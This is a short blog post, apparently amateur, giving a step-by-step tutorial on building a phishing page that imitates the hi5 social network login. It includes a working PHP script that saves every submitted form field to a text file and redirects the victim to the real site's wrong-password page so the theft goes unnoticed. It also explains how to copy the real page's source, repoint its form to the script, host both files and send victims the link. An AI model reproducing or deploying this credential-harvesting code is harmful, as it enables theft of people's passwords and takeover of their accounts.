Hi. In this tutorial im going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen hi5 as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.
---Open notepad and put this code:
header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now save this as phish.php
Note:
This URL is the url where the victim is redirected after logging in to you fake page.I have chosen the page where it says wrong password so the victim will think that he really wrote the password wrong and will just try again this time to the real hi5 page.
Note 2:
If you are smart you should change
$handle = fopen("passwords.txt", "a");
$handle = fopen("laughingmyassoffgrandpa.txt", "a");
/passwords.txt
. you know?
Part 2:.
Now we go to
www.hi5.com
and right click / View Source.
Now we need to find this part of source:
action=someurl.com
In this case we have:
| action="/friend/login.do" |
action="phish.php"
Upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file named passwords.txt in the same directory as login.php and phish.php. Just open the password.txt and you will see the passwords.
Enjoy!
No comments:
Post a Comment